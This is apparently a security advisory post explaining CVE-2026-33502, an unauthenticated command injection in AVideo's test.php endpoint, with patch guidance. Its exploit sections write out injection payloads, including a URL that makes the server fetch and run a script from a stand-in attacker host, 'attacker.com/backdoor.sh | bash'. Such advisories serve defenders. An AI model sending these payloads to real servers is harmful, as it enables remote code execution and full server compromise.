AVideo, Command Injection, CVE-2026-33502 (Critical)

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in AVideo’s plugin/Live/test.php endpoint.

An incomplete fix added escapeshellarg() only for the wget code path.
The URL validation uses preg_match(“/^http/”, $url) which is weak.
This regex matches any string starting with “http”, e.g., “httpevil.com”.
It does not require “://” and does not block shell metacharacters.
The vulnerable wget() function builds a command: wget –tries=1 {$url} -O {$filename} –no-check-certificate.

Neither $url nor $filename is sanitized with escapeshellarg().

An attacker can inject semicolons, backticks, or $() into the URL.
Payload like “http://x; id > /tmp/pwned; echo” passes the weak regex.
The semicolon terminates the wget URL and executes arbitrary commands.
The fix added escapeshellarg() for wget but left file_get_contents() and curl() unsanitized.
Both alternative code paths still process the same user-supplied URL.

They follow redirects and lack any shell escaping.

The test.php endpoint does not require authentication (User::isAdmin() missing).
Thus an unauthenticated attacker can achieve remote code execution.
The incomplete patch creates a false sense of security while other vectors remain open.
No proper URL scheme validation or allowlist is applied globally.
The vulnerability allows full server compromise via command injection.

dailycve form:

Platform: AVideo
Version: < commit1e6cf03e93b5
Vulnerability: Command Injection
Severity: Critical
date: 2026-04-14

Prediction: 2026-04-20

What Undercode Say:

Check vulnerable regex behavior
echo "httpevil.com" | grep -E '^http'
Simulate injection command
curl -k "https://target/plugin/Live/test.php?url=http://x; id > /tmp/pwned; echo"
Verify wget unsanitized path (manual test)
python3 -c "import re; print(re.match(r'^http', 'http://x; id'))"
List alternative vulnerable functions (file_get_contents)
php -r "echo file_get_contents('http://evil.com|whoami');"

Exploit:

Send HTTP GET request to /plugin/Live/test.php with parameter `url` containing shell metacharacters. Example: http://target/plugin/Live/test.php?url=http://x; curl attacker.com/backdoor.sh | bash; echo. No authentication required. The weak regex accepts the payload, and wget (or fallback file_get_contents/curl) executes the injected command on the server.

Protection from this CVE:

Apply commit 1e6cf03e93b5 or later. Additionally, manually patch test.php: use escapeshellarg() on all user inputs in wget, curl, and file_get_contents paths. Strengthen URL regex to `^https?://` and reject shell metacharacters. Enforce authentication (User::isAdmin()) for test.php. Disable test.php in production if not needed.

Impact:

Unauthenticated remote code execution leading to full server compromise. Attacker can read database credentials, install backdoors, pivot to internal networks, and take complete control of the AVideo server.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top